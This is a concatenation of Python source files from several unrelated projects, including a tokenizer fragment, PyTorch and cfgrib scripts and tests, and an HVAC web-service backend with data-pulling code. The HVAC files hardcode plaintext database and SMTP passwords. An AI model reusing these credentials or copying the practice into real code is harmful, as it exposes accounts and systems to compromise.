rest_string, line, column = shift(rest_string, line, column)
elif rest_string[0] == '#':
comment_start_line = line
comment_start_column = column
rest_string, line, column = shift(rest_string, line, column)
comment = ''
while len(rest_string):
if rest_string[0] == '\n':
break
comment += rest_string[0]
rest_string, line, column = shift(rest_string, line, column)
yield Token(TokenType.comment, token_string=whitespace_prefix + '#' + comment, text=comment, line=comment_start_line, column=comment_start_column)
whitespace_prefix = ''
elif rest_string[0] in string.ascii_letters:
name_start_line = line
name_start_column = column
name = ''
while len(rest_string) and rest_string[0] in string.ascii_letters:
name += rest_string[0]
rest_string, line, column = shift(rest_string, line, column)
yield Token(TokenType.name, token_string=whitespace_prefix + name, text=name, line=name_start_line, column=name_start_column)
whitespace_prefix = ''
elif rest_string[0] in string.digits:
number_start_line = line
number_start_column = column
number = ''
while len(rest_string) and rest_string[0] in string.digits:
number += rest_string[0]
rest_string, line, column = shift(rest_string, line, column)
yield Token(TokenType.number, token_string=whitespace_prefix + number, text=number, line=number_start_line, column=number_start_column)
whitespace_prefix = ''
elif any(rest_string.startswith(symbol) for symbol in symbols):
for symbol, token_type in sorted(symbols.items(), key=lambda pair: -len(pair[0])): # look at longer symbols first, so that a += is not mistakenly tokenized as a +
if rest_string.startswith(symbol):
if len(parens_stack):
if token_type is TokenType.open_paren:
parens_stack[-1] += 1
elif token_type is TokenType.close_paren:
parens_stack[-1] -= 1
if len(parens_stack) == 0 or parens_stack[-1] >= 0:
yield Token(token_type, token_string=whitespace_prefix + rest_string[:len(symbol)], line=line, column=column)
whitespace_prefix = ''
rest_string, line, column = shift(rest_string, line, column, amount=len(symbol))
break
else:
yield Token(TokenType.illegal, token_string=whitespace_prefix + rest_string, text=rest_string, line=line, column=column)
return
if len(whitespace_prefix):
yield Token(TokenType.trailing_whitespace, token_string=whitespace_prefix)
``` |
{
"source": "jqsl2012/pytorch-fm",
"score": 2
} |
#### File: pytorch-fm/examples/torch_load.py
```python
import torch
from sklearn.metrics import roc_auc_score
import tqdm
from torch.utils.data import DataLoader
from torchfm.dataset.avazu import AvazuDataset
from torchfm.dataset.criteo import CriteoDataset
from torchfm.dataset.movielens import MovieLens1MDataset, MovieLens20MDataset
import time
def get_dataset(name, path):
if name == 'movielens1M':
return MovieLens1MDataset(path)
elif name == 'movielens20M':
return MovieLens20MDataset(path)
elif name == 'criteo':
# return CriteoDataset(path, cache_path='.criteo_test')
return CriteoDataset(path)
elif name == 'avazu':
return AvazuDataset(path)
else:
raise ValueError('unknown dataset name: ' + name)
def load_model():
save_path = '/home/eduapp/pytorch-fm/data/criteo/save_dir/ipnn.pt'
# save_path = '/home/eduapp/pytorch-fm/data/criteo/save_dir/lr.pt'
save_path = '/home/eduapp/pytorch-fm/examples_prod/ipnn.pt'
model = torch.load(save_path)
print(model.eval())
return model
def test(model, data_loader, device):
model.eval()
targets, predicts = list(), list()
result_list = []
with torch.no_grad():
for fields, target in tqdm.tqdm(data_loader, smoothing=0, mininterval=1.0):
fields, target = fields.to(device).long(), target.to(device).long()
y = model(fields)
targets.extend(target.tolist())
predicts.extend(y.tolist())
print('========pred result list save to file================')
for i in range(len(targets)):
result_list.append(str(targets[i]) + ',' + str(predicts[i]) + '\n')
file = open('result_list.txt', "w")
file.writelines(result_list)
file.close()
from sklearn.metrics import classification_report
arr = []
for x in predicts:
# print(x)
arr.append(1) if x >= 0.5 else arr.append(0)
print(classification_report(targets, arr))
auc = roc_auc_score(targets, arr)
print('auc={}'.format(auc))
if __name__ == '__main__':
model = load_model()
device = torch.device('cpu')
dataset_path = '/home/eduapp/best_flow/20200907_more2more/all_features.train.1000.fe_output.csv'
# dataset_path = '/home/eduapp/pytorch-fm/examples/all_features.train.1000.fe_output.csv'
dataset_path = '/home/eduapp/best_flow/20200907_more2more/all_features_use_model_estimate_path.fe_output.csv'
dataset_path = '/home/eduapp/best_flow/20200907_more2more/all_features.train.fe_output.csv'
t1 = time.time()
dataset = get_dataset('criteo', dataset_path)
train_length = int(len(dataset) * 0.1)
valid_length = int(len(dataset) * 0.1)
test_length = len(dataset) - train_length - valid_length
train_dataset, valid_dataset, test_dataset = torch.utils.data.random_split(
dataset, (train_length, valid_length, test_length))
test_data_loader = DataLoader(test_dataset, batch_size=2048, num_workers=0)
print('dataset time={}'.format(time.time() - t1))
test(model, test_data_loader, device)
```
#### File: torchfm/dataset/flow.py
```python
import numpy as np
import pandas as pd
import torch.utils.data
class FlowDataset(torch.utils.data.Dataset):
"""
MovieLens 20M Dataset
Data preparation
treat samples with a rating less than 3 as negative samples
:param dataset_path: MovieLens dataset path
Reference:
https://grouplens.org/datasets/movielens
"""
def __init__(self, dataset_path, sep=',', engine='c', header='infer'):
print('__init___')
data = pd.read_csv(dataset_path, sep=sep, engine=engine, header=header).to_numpy()[:, :]
self.items = data[:, 1:].astype(np.float64) # -1 because ID begins from 1
self.targets = data[:, 1].astype(np.int)
#print(self.targets)
#self.field_dims = np.max(self.items, axis=0) + 1
self.field_dims = np.array([2, 4, 2, 34, 18, 7, 998, 208, 47, 3, 2, 5, 3, 3, 982, 972, 375, 982, 951, 443, 979, 951, 455, 606, 850, 808, 1012, 573, 573, 87, 670, 588, 664, 663, 670, 99, 98, 52, 1072, 1057, 1059, 390, 1060, 479, 429, 175, 860, 860, 860, 860, 196, 893, 216, 903, 178, 665, 910, 570, 407, 4, 22, 139])
print(type(self.field_dims), self.field_dims)
def __len__(self):
print('.....__len__...', self.targets.shape[0])
return self.targets.shape[0]
def __getitem__(self, index):
#print('.....__getitem__...', index)
#print(index, self.targets[index], self.items[index])
return self.items[index], self.targets[index]
``` |
{
"source": "jqs-noaa/cfgrib",
"score": 2
} |
#### File: cfgrib/cfgrib/xarray_store.py
```python
import logging
import typing as T # noqa
import warnings
import xarray as xr
from . import DatasetBuildError, open_fileindex
LOGGER = logging.getLogger(__name__)
def open_dataset(path, **kwargs):
# type: (str, T.Any) -> xr.Dataset
"""
Return a ``xr.Dataset`` with the requested ``backend_kwargs`` from a GRIB file.
"""
if "engine" in kwargs and kwargs["engine"] != "cfgrib":
raise ValueError("only engine=='cfgrib' is supported")
kwargs["engine"] = "cfgrib"
return xr.backends.api.open_dataset(path, **kwargs)
def merge_datasets(datasets, **kwargs):
merged = []
for ds in datasets:
ds.attrs.pop("history", None)
for i, o in enumerate(merged):
if all(o.attrs[k] == ds.attrs[k] for k in o.attrs):
try:
o = xr.merge([o, ds], **kwargs)
o.attrs.update(ds.attrs)
merged[i] = o
break
except Exception:
pass
else:
merged.append(ds)
return merged
def raw_open_datasets(path, backend_kwargs={}, **kwargs):
# type: (str, T.Dict[str, T.Any], T.Any) -> T.List[xr.Dataset]
fbks = []
datasets = []
try:
datasets.append(open_dataset(path, backend_kwargs=backend_kwargs, **kwargs))
except DatasetBuildError as ex:
fbks.extend(ex.args[2])
# NOTE: the recursive call needs to stay out of the exception handler to avoid showing
# to the user a confusing error message due to exception chaining
for fbk in fbks:
bks = backend_kwargs.copy()
bks["filter_by_keys"] = fbk
datasets.extend(raw_open_datasets(path, backend_kwargs=bks, **kwargs))
return datasets
def open_variable_datasets(path, backend_kwargs={}, **kwargs):
fileindex_kwargs = {
key: backend_kwargs[key]
for key in ["filter_by_keys", "indexpath", "grib_errors"]
if key in backend_kwargs
}
index = open_fileindex(path, **fileindex_kwargs)
datasets = []
for param_id in sorted(index["paramId"]):
bk = backend_kwargs.copy()
bk["filter_by_keys"] = backend_kwargs.get("filter_by_keys", {}).copy()
bk["filter_by_keys"]["paramId"] = param_id
datasets.extend(raw_open_datasets(path, bk, **kwargs))
return datasets
def open_datasets(path, no_warn=False, backend_kwargs={}, **kwargs):
"""
Open a GRIB file groupping incompatible hypercubes to different datasets via simple heuristics.
"""
if no_warn:
warnings.warn("open_datasets is now public, no_warn will be removed", FutureWarning)
squeeze = backend_kwargs.get("squeeze", True)
backend_kwargs = backend_kwargs.copy()
backend_kwargs["squeeze"] = False
datasets = open_variable_datasets(path, backend_kwargs=backend_kwargs, **kwargs)
type_of_level_datasets = {}
for ds in datasets:
for _, da in ds.data_vars.items():
type_of_level = da.attrs.get("GRIB_typeOfLevel", "undef")
type_of_level_datasets.setdefault(type_of_level, []).append(ds)
merged = []
for type_of_level in sorted(type_of_level_datasets):
for ds in merge_datasets(type_of_level_datasets[type_of_level], join="exact"):
merged.append(ds.squeeze() if squeeze else ds)
return merged
```
#### File: cfgrib/tests/test_10_bindings.py
```python
import os.path
import pytest
from cfgrib import bindings
SAMPLE_DATA_FOLDER = os.path.join(os.path.dirname(__file__), "sample-data")
TEST_DATA = os.path.join(SAMPLE_DATA_FOLDER, "era5-levels-members.grib")
TEST_DATA_B = TEST_DATA.encode("ASCII")
@pytest.mark.parametrize(
"code, message", [(0, "No error"), (-43, "End of index reached"),],
)
def test_grib_get_error_message(code, message):
res = bindings.grib_get_error_message(code)
assert res == message
def test_check_last():
codes_handle_new_from_file = bindings.check_last(bindings.lib.codes_handle_new_from_file)
with open(TEST_DATA) as file:
codes_handle_new_from_file(bindings.ffi.NULL, file, bindings.CODES_PRODUCT_GRIB)
with pytest.raises(bindings.GribInternalError):
with open(__file__) as file:
codes_handle_new_from_file(bindings.ffi.NULL, file, bindings.CODES_PRODUCT_GRIB)
def test_check_return():
def identity(code):
return code
bindings.check_return(identity)(0)
with pytest.raises(bindings.GribInternalError):
bindings.check_return(identity)(-1)
def test_codes_grib_new_from_file():
res = bindings.codes_grib_new_from_file(open(TEST_DATA))
assert isinstance(res, bindings.ffi.CData)
assert "'grib_handle *'" in repr(res)
def test_codes_clone():
handle = bindings.codes_grib_new_from_file(open(TEST_DATA))
res = bindings.codes_clone(handle)
assert isinstance(res, bindings.ffi.CData)
assert "'grib_handle *'" in repr(res)
def test_codes_grib_new_from_file_errors(tmpdir):
empty_grib = tmpdir.join("empty.grib")
empty_grib.ensure()
with pytest.raises(EOFError):
bindings.codes_grib_new_from_file(open(str(empty_grib)))
garbage_grib = tmpdir.join("garbage.grib")
garbage_grib.write("gargage")
with pytest.raises(EOFError):
bindings.codes_grib_new_from_file(open(str(garbage_grib)))
bad_grib = tmpdir.join("bad.grib")
bad_grib.write("GRIB")
with pytest.raises(bindings.GribInternalError):
bindings.codes_grib_new_from_file(open(str(bad_grib)))
@pytest.mark.parametrize(
"key, expected_type, expected_value",
[
("numberOfDataPoints", int, 7320),
("latitudeOfFirstGridPointInDegrees", float, 90.0),
("gridType", str, "regular_ll"),
],
)
def test_codes_get(key, expected_type, expected_value):
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
result = bindings.codes_get(grib, key)
assert isinstance(result, expected_type)
assert result == expected_value
def test_codes_get_errors():
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
with pytest.raises(bindings.GribInternalError) as err:
bindings.codes_get(grib, "gridType", length=1) # too short
assert err.value.code == bindings.lib.GRIB_BUFFER_TOO_SMALL
@pytest.mark.parametrize(
"key, expected_value",
[
("numberOfDataPoints", [7320]),
("latitudeOfFirstGridPointInDegrees", [90.0]),
("gridType", ["regular_ll"]),
],
)
def test_codes_get_array(key, expected_value):
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
result = bindings.codes_get_array(grib, key)
assert result == expected_value
def test_codes_get_array_errors():
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
with pytest.raises(bindings.GribInternalError) as err:
bindings.codes_get_array(grib, "values", size=1) # too short
assert err.value.code == bindings.lib.GRIB_ARRAY_TOO_SMALL
with pytest.raises(bindings.GribInternalError) as err:
bindings.codes_get_array(grib, "values", key_type=int) # wrong type
assert err.value.code == bindings.lib.GRIB_NOT_IMPLEMENTED
def test_codes_get_length():
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
res = bindings.codes_get_string_length(grib, "numberOfForecastsInEnsemble")
assert res == 1025
res = bindings.codes_get_string_length(grib, "marsParam")
assert res == 8
def test_codes_keys_iterator():
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
iterator = bindings.codes_keys_iterator_new(grib)
assert bindings.codes_keys_iterator_next(iterator) == 1
assert bindings.codes_keys_iterator_get_name(iterator) == "globalDomain"
assert bindings.codes_keys_iterator_next(iterator) == 1
assert bindings.codes_keys_iterator_get_name(iterator) == "GRIBEditionNumber"
bindings.codes_keys_iterator_delete(iterator)
iterator = bindings.codes_keys_iterator_new(grib, namespace="time")
assert bindings.codes_keys_iterator_next(iterator) == 1
assert bindings.codes_keys_iterator_get_name(iterator) == "dataDate"
assert bindings.codes_keys_iterator_next(iterator) == 1
assert bindings.codes_keys_iterator_get_name(iterator) == "dataTime"
bindings.codes_keys_iterator_delete(iterator)
def test_codes_get_api_version():
res = bindings.codes_get_api_version()
assert isinstance(res, str)
assert res.count(".") == 2
def test_codes_new_from_samples():
res = bindings.codes_new_from_samples("regular_ll_sfc_grib2")
assert isinstance(res, bindings.ffi.CData)
assert "grib_handle *'" in repr(res)
def test_codes_new_from_samples_errors():
with pytest.raises(ValueError):
bindings.codes_new_from_samples("non-existent")
def test_codes_set():
message_id = bindings.codes_new_from_samples("regular_ll_sfc_grib2")
bindings.codes_set(message_id, "endStep", 2)
bindings.codes_set(message_id, "longitudeOfFirstGridPointInDegrees", 1.0)
bindings.codes_set(message_id, "gridType", "regular_ll")
with pytest.raises(TypeError):
bindings.codes_set(message_id, "endStep", [])
def test_codes_set_array():
message_id = bindings.codes_new_from_samples("regular_ll_sfc_grib2")
bindings.codes_set_array(message_id, "values", [0.0])
bindings.codes_set_array(message_id, "values", [0])
with pytest.raises(ValueError):
bindings.codes_set_array(message_id, "values", [])
with pytest.raises(TypeError):
bindings.codes_set_array(message_id, "values", ["a"])
def test_codes_write(tmpdir):
message_id = bindings.codes_new_from_samples("regular_ll_sfc_grib2")
grib_file = tmpdir.join("test.grib")
with open(str(grib_file), "wb") as file:
bindings.codes_write(message_id, file)
assert grib_file.read_binary()[:4] == b"GRIB"
with open(str(grib_file)) as file:
bindings.codes_grib_new_from_file(file)
``` |
{
"source": "jqsun1/intelligent_hvac_backend",
"score": 2
} |
#### File: code/DataRetrieval/dataPull.py
```python
import zeep
import traceback
import sqlalchemy
import math
import time
from zeep.transports import Transport
from requests.auth import HTTPBasicAuth
from requests import Session as WebSession
from datetime import datetime, timezone, timedelta
from hvacDBMapping import *
from sqlalchemy.orm import sessionmaker
global componentsList, componentsClasses
componentsList = ["AHU", "VFD", "Filter", "Damper", "Fan", "HEC", "SAV", "VAV", "Thermafuser"]
componentsClasses = {"ahu":AHU, "vfd":VFD, "filter":Filter, "damper":Damper, "fan":Fan, "hec":HEC, "sav":SAV, "vav":VAV, "thermafuser":Thermafuser}
readingClasses = {"ahu":AHUReading, "vfd":VFDReading, "filter":FilterReading, "damper":DamperReading, "fan":FanReading, "hec":HECReading, "sav":SAVReading, "vav":VAVReading, "thermafuser":ThermafuserReading}
def getClient(servicewsdl):
"""Attempt to stablish a connection to the webservice and return a client object connected to servicewsdl webservice"""
client = None
try:
webSession = WebSession()
webSession.auth = HTTPBasicAuth('soap', "")
transport = Transport(timeout=10, session = webSession)
client = zeep.Client(wsdl=servicewsdl, transport=transport)
print('Client successfully created')
except Exception as e:
print(traceback.format_exc())
print("error in getting a client to the webservice")
return client
def getDatabaseConnection(databaseString):
"""Attempt connection to the database"""
sqlsession = None
try:
sqlengine = sqlalchemy.create_engine(databaseString)
SQLSession = sessionmaker(bind=sqlengine)
sqlsession = SQLSession()
print("Connection to " + databaseString + " successfull")
except Exception as e:
print(traceback.format_exc())
print("Error in connection to the database")
return sqlsession
def pullData(trendServiceClient, startDateTime, databaseSession):
"""Retrieve the data stored in the trend points of the WebCtrl program from the indicated startDateTime onwards and store them in the database.
This function will pull data from the database every 5 minutes starting from startDateTime and will keep doing it indefinetly."""
#get the datapoints and separate them by component type (this should be relaunched everytime the database is modified)
dataPoints = {key.lower():databaseSession.query(DataPoint._path, DataPoint._componentId, PathMapping._databaseMapping).
join(PathMapping).filter(PathMapping._componentType == key).all() for key in componentsList}
PDT = timezone(-timedelta(hours=7), 'PDT')
timeDelta = timedelta(minutes = 5)
#Repeat indefinetely
while True:
#Define the endTime
endDateTime = startDateTime + timeDelta
currentTime = datetime.now(tz=PDT)
currentTime = currentTime.replace(second=0, microsecond=0)
#If desired time hasnt been reached yet, wait for a couple of minutes
if currentTime < endDateTime:
waitingMinutes = (endDateTime - currentTime) + timedelta(minutes=1)
print(str(currentTime) + " Desired time " + str(endDateTime) + " not reached yet, halting for " + str(waitingMinutes) + " minutes")
time.sleep(waitingMinutes.seconds)
print("Desired time reached, continuing job")
#For each type of components get its readings from the web service
for key in dataPoints:
print("\nPulling points of " + key + "\n")
components = dict()
for dataPoint in dataPoints[key]:
path, componentId, databaseMapping = dataPoint
if componentId in components:
component = components[componentId]
else:
component = readingClasses[key](endDateTime, componentId)
components[componentId] = component
try:
data = trendServiceClient.service.getTrendData('soap',"", path, startDateTime.strftime("%m/%d/20%y %I:%M:%S %p"), endDateTime.strftime("%m/%d/20%y %I:%M:%S %p"), False, 0)
#Check if the current point already has a component
readingValue = data[-1]
print(path, readingValue)
setattr(component, databaseMapping, readingValue)
except Exception as e:
print(traceback.format_exc())
print("Error in retrieving value for " + path)
databaseSession.add_all(components.values())
databaseSession.commit()
#Define the new start time
startDateTime = endDateTime
break
def main():
Evalwsdl = 'http://10.20.0.47/_common/webservices/Eval?wsdl'
Trendwsdl = 'http://10.20.0.47/_common/webservices/TrendService?wsdl'
databaseString = "mysql+mysqldb://dlaredorazo:@Dexsys13@localhost:3306/HVAC2"
#Make sure starting time is a multiple of 5 in the minutes and that its a past time.
#To ensure that we will be able to get the readings we try to get the readings from 5+ minutes before the current time.
PDT = timezone(-timedelta(hours=7), 'PDT')
startTime = datetime.now(tz=PDT)
minute = math.floor(startTime.minute/5)*5 - 5
if minute < 0:
minute = 55
hour = startTime - timedelta(hour=1)
startTime = startTime.replace(second=0, microsecond=0, minute=minute, hour=hour)
else:
startTime = startTime.replace(second=0, microsecond=0, minute=minute)
print("Start time " + str(startTime))
#get a connection to the webservice
trendServiceClient = getClient(Trendwsdl)
sqlsession = getDatabaseConnection(databaseString)
if trendServiceClient != None and sqlsession != None:
pullData(trendServiceClient, startTime, sqlsession)
main()
```
#### File: webServiceTest/iHvac/hvacIssueDBMapping.py
```python
from sqlalchemy import Column, Integer, String, Table, DateTime, Float, Boolean, ForeignKey, ForeignKeyConstraint
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship, backref, class_mapper
Base = declarative_base()
class HVACIssue(Base):
"""Class to map to the HVACIssue table in the HVAC DB"""
__tablename__ = 'HVACIssue'
_id = Column('IssueId', Integer, primary_key = True, autoincrement = True)
_buildingLocation = Column('BuildingLocation', String(255))
_floorLocation = Column('FloorLocation', Integer)
_roomLocation = Column('RoomLocation', String(255))
_description = Column('Description', String(255))
#Constructor
def __init__(self, buildingLocation, floorLocation, roomLocation, description):
#self._id = identifier
self._buildingLocation = buildingLocation
self._floorLocation = floorLocation
self._roomLocation = roomLocation
self._description = description
#Properties
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def buildingLocation(self):
return self._buildingLocation
@buildingLocation.setter
def buildingLocation(self, value):
self._buildingLocation = value
@property
def floorLocation(self):
return self._floorLocation
@floorLocation.setter
def floorLocation(self, value):
self._floorLocation = value
@property
def roomLocation(self):
return self._roomLocation
@roomLocation.setter
def roomLocation(self, value):
self._roomLocation = value
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
def __str__(self):
return "<HvacIssue(id = '%s', buildingLocation = '%s', floorLocation = '%s', roomLocation = '%s', description = '%s')>" \
% (self._id, self._buildingLocation, self._floorLocation, self._roomLocation, self._description)
class Building(Base):
"""Class to map to the HVACIssue table in the HVAC DB"""
__tablename__ = 'Building'
_id = Column('Id', Integer, primary_key = True)
_buildingName = Column('BuildingName', String(255))
#Relationships
_floors = relationship('Floor', back_populates = '_building') #Floors and Building
#Constructor
def __init__(self, identifier, buildingName):
self._id = identifier
self._buildingName = buildingName
#Properties
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def buildingName(self):
return self._buildingName
@buildingName.setter
def buildingName(self, value):
self._buildingName = value
@property
def floors(self):
return self._floors
@floors.setter
def floors(self, value):
self._floors = value
#Methods
def __str__(self):
return "<Building(id = '%s', buildingName = '%s')>" \
% (self._id, self._buildingName)
def serialize(self):
return{
'buildingId':self._id,
'buildingName':self._buildingName
}
class Floor(Base):
"""Class to map to the HVACIssue table in the HVAC DB"""
__tablename__ = 'Floor'
_buildingId = Column('BuildingId', Integer, ForeignKey("Building.Id"), primary_key = True)
_floorNumber = Column('FloorNumber', Integer, primary_key = True)
_floorName = Column('FloorName', String(255))
#Relationships
_building = relationship('Building', back_populates = '_floors') #Floors and Building
_rooms = relationship('Room', back_populates = '_floor') #Floor and Rooms
#Constructor
def __init__(self, buildingId, floorNumber, floorName):
self._buildingId = buildingId
self._floorNumber = floorNumber
self._floorName = floorName
#Properties
@property
def buildingId(self):
return self._buildingId
@buildingId.setter
def buildingId(self, value):
self._buildingId = value
@property
def floorNumber(self):
return self._floorNumber
@floorNumber.setter
def floorNumber(self, value):
self._floorNumber = value
@property
def floorName(self):
return self._floorName
@floorName.setter
def floorName(self, value):
self._floorName = value
#Methods
def __str__(self):
return "<Floor(buildingId = '%s', floorNumber = '%s', floorName = '%s')>" \
% (self._buildingId, self._floorNumber, self._floorName)
def serialize(self):
return{
'buildingId':self._buildingId,
'floorNumber':self._floorNumber,
'floorName':self._floorName,
}
class Room(Base):
"""Class to map to the HVACIssue table in the HVAC DB"""
__tablename__ = 'Room'
_buildingId = Column('BuildingId', Integer, primary_key = True)
_floorNumber = Column('FloorNumber', Integer, primary_key = True)
_roomId = Column('RoomId', Integer, primary_key = True)
_roomName = Column('RoomName', String(255))
#Foreign key
__table_args__ = (ForeignKeyConstraint(['BuildingId', 'FloorNumber'], ['Floor.BuildingId', 'Floor.FloorNumber'], onupdate="CASCADE", ondelete="CASCADE"), {})
#Relationships
_floor = relationship('Floor', back_populates = '_rooms') #Rooms and Floor
#Constructor
def __init__(self, buildingId, floorNumber, roomId, roomName):
self._buildingId = buildingId
self._floorNumber = floorNumber
self._roomId = roomId
self._roomName = roomName
#Properties
@property
def buildingId(self):
return self._buildingId
@buildingId.setter
def buildingId(self, value):
self._buildingId = value
@property
def floorNumber(self):
return self._floorNumber
@floorNumber.setter
def floorNumber(self, value):
self._floorNumber = value
@property
def roomId(self):
return self._roomId
@roomId.setter
def roomId(self, value):
self._roomId = value
@property
def roomName(self):
return self._floorName
@roomName.setter
def roomName(self, value):
self._floorName = value
#Methods
def __str__(self):
return "<Room(buildingId = '%s', floorNumber = '%s', roomId = '%s', roomName = '%s')>" \
% (self._buildingId, self._floorNumber, self._roomId, self._roomName)
def serialize(self):
return{
'buildingId':self._buildingId,
'floorNumber':self._floorNumber,
'roomId':self._roomId,
'roomName':self._roomName
}
```
#### File: webServiceTest/iHvac/hvacServices.py
```python
from flask import request, current_app, Blueprint, render_template
from sqlalchemy import and_
from flask_sqlalchemy import SQLAlchemy
from iHvac.db import *
from iHvac.hvacIssueDBMapping import *
from . import global_s
from flask import jsonify
from smtplib import SMTP
import datetime
bp = Blueprint('services', __name__, url_prefix='/services')
# a simple page that says hello
@bp.route('/hello', methods=['POST'])
def hello():
return "hello"
@bp.route('/reportHvacIssue', methods=['POST'])
def reporthvacIssue():
if request.method == 'POST':
data = request.get_json()
locationBuilding = data['buildingId']
locationFloor = data['floorId']
locationRoom = data['roomId']
description = data['issueDescription']
hvacIssue = HVACIssue(locationBuilding, locationFloor, locationRoom, description)
global_s.dbConnection.session.add(hvacIssue)
global_s.dbConnection.session.commit()
return jsonify(True)
@bp.route('/getBuildingRoomsByFloor', methods=['POST'])
def getBuildingRoomsByFloor():
if request.method == 'POST':
data = request.get_json()
floor = global_s.dbConnection.session.query(Floor).filter(and_(Floor._buildingId == data["buildingId"]), Floor._floorNumber == data["buildingFloor"]).one()
rooms = [r.serialize() for r in floor._rooms]
return jsonify(rooms)
@bp.route('/getBuildingFloors', methods=['POST'])
def getBuildingFloors():
if request.method == 'POST':
data = request.get_json()
building = global_s.dbConnection.session.query(Building).filter(Building._id == data["buildingId"]).one()
floors = [f.serialize() for f in building.floors]
return jsonify(floors)
@bp.route('/getBuildings', methods=['POST'])
def getBuildings():
if request.method == 'POST':
buildings = global_s.dbConnection.session.query(Building).all()
bldgs = [b.serialize() for b in buildings]
return jsonify(bldgs)
@bp.route('/errorMail', methods=['GET'])
def errorMail():
if request.method == 'GET':
message_text = request.args.get('message')
subj = request.args.get('subj')
#message_text = "Hello\nThis is a mail from your server\n\nBye\n"
sendMail(message_text, subj)
return "Mail sent"
def sendMail(message_text, subj):
smtp = SMTP("smtp.gmail.com:587")
smtp.ehlo()
smtp.starttls()
smtp.login("<EMAIL>", "controlslab.uc")
from_addr = "Controls Lab <<EMAIL>>"
to_addr = "<EMAIL>"
#subj = "Critical"
date = datetime.datetime.now().strftime("%d/%m/%Y %H:%M")
#message_text = "Hello\nThis is a mail from your server\n\nBye\n"
msg = "From %s\nTo: %s\nSubject: %s\nDate: %s\n\n%s" % (from_addr, to_addr, subj, date, message_text)
smtp.sendmail(from_addr, to_addr, msg)
smtp.quit()
```
#### File: webServiceTest/iHvac/__init__.py
```python
import os
import logging
from flask import Flask
#from .hvacIssueDBMapping import *
#from . import db
from . import hvacServices
from flask_sqlalchemy import SQLAlchemy
from . import global_s
def create_app(test_config=None):
# create and configure the app
app = Flask(__name__, instance_relative_config=True)
app.config.from_mapping(
SECRET_KEY='dev',
#DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),
SQLALCHEMY_DATABASE_URI="mysql+mysqldb://ihvac:[email protected]:3306/HVACIssues",
)
if test_config is None:
# load the instance config, if it exists, when not testing
app.config.from_pyfile('config.py', silent=True)
else:
# load the test config if passed in
app.config.from_mapping(test_config)
#set the logger config
logging.basicConfig(filename='hvacIssue.log', level=logging.WARNING,\
format='%(levelname)s:%(threadName)s:%(asctime)s:%(filename)s:%(funcName)s:%(message)s', datefmt='%m/%d/%Y %H:%M:%S')
# ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
#db.init_app(app)
app.register_blueprint(hvacServices.bp)
global_s.dbConnection = SQLAlchemy(app)
return app
``` |
{
"source": "jqsunac/doi",
"score": 2
} |
#### File: fevo.2021.762173/scripts/generate_meshdataset.py
```python
import os
import sys
import re
import numpy as np
import pandas as pd
level = sys.argv[1]
kankyo_fpath = sys.argv[2]
spname_fpath = sys.argv[3]
class_fpath = sys.argv[4]
output_fpath = sys.argv[5]
def mesh2gps(mesh_code):
mesh_code = str(mesh_code)
lat = int(mesh_code[0:2]) * 2 / 3
lng = int(mesh_code[2:4]) + 100
if len(mesh_code) > 4:
if len(mesh_code) >= 6:
lat += int(mesh_code[4]) * 2 / 3 / 8
lng += int(mesh_code[5]) / 8
return (lat, lng)
# get class labels (the order should be matched to image-model outputs)
class_labels = []
with open(class_fpath, 'r') as infh:
for buf in infh:
class_labels.append(buf.replace('\n', ''))
# get metadata to convert species ID to species biname
id2class = {}
with open(spname_fpath, 'r') as infh:
infh.readline()
for buf in infh:
bufs = buf.replace('\n', '').split(',')
id2class[bufs[0]] = bufs[4] + '_' + bufs[6]
# read Kankyosho public data
# and manually modifiy Kankyosho data according to rearrangement of taxonomic orders
## Rhipidolestes okinawanus: 392722, 392746, 392756, 392757, 392860, 392870
## Rhipidolestes shozoi: 392860, 392870, 402801, 402811, 402812
## Rhipidolestes amamiensis: 412857, 412867, 422922, 222932, 422933, 422944, 473002
## Rhipidolestes asatoi: 472935, 472945
## Anotogaster klossi: 362336, 362337, 362346, 362347, 362441, 362451
## Rhipidolestes yakusimensis: remove 472935, 472945, and add 473002 from the original set
## Anotogaster sieboldii: remove 362336, 362337, 362346, 362347, 362441, 362451 from the original set
fdata_mesh = []
fdata_species = []
with open(kankyo_fpath, 'r') as infh:
for buf in infh:
bufs = buf.replace('\n', '').split(',')
cl = id2class[bufs[0]]
if cl == 'Rhipidolestes_yakusimensis':
if bufs[1] in ['472935', '472945']:
print('removed: ' + cl + ' -- ' + bufs[1])
else:
fdata_mesh.append(bufs[1])
fdata_species.append(id2class[bufs[0]])
elif cl == 'Anotogaster_sieboldii':
if bufs[1] in ['362336', '362337', '362346', '362347', '362441', '362451']:
print('removed: ' + cl + ' -- ' + bufs[1])
else:
fdata_mesh.append(bufs[1])
fdata_species.append(id2class[bufs[0]])
else:
fdata_mesh.append(bufs[1])
fdata_species.append(id2class[bufs[0]])
fdata_species.extend(['Rhipidolestes_okinawanus'] * 6)
fdata_mesh.extend(['392722', '392746', '392756', '392757', '392860', '392870'])
fdata_species.extend(['Rhipidolestes_shozoi'] * 5)
fdata_mesh.extend(['392860', '392870', '402801', '402811', '402812'])
fdata_species.extend(['Rhipidolestes_amamiensis'] * 7)
fdata_mesh.extend(['412857', '412867', '422922', '222932', '422933', '422944', '473002'])
fdata_species.extend(['Rhipidolestes_asatoi'] * 2)
fdata_mesh.extend(['472935', '472945'])
fdata_species.extend(['Anotogaster_klossi'] * 6)
fdata_mesh.extend(['362336', '362337', '362346', '362347', '362441', '362451'])
fdata_species.extend(['Rhipidolestes_yakusimensis'])
fdata_mesh.extend(['473002'])
# change species name (level) to genus name (level)
if level == 'genus':
for i, spname in enumerate(fdata_species):
fdata_species[i] = spname.split('_')[0]
# mesh to lat&lng
latlng = []
for _fdata_mesh in sorted(list(set(fdata_mesh))):
latlng.append(mesh2gps(_fdata_mesh))
latlng = pd.DataFrame(latlng, columns=['lat', 'lng'],
index=sorted(list(set(fdata_mesh))))
# make appearance matrix
print(len(class_labels))
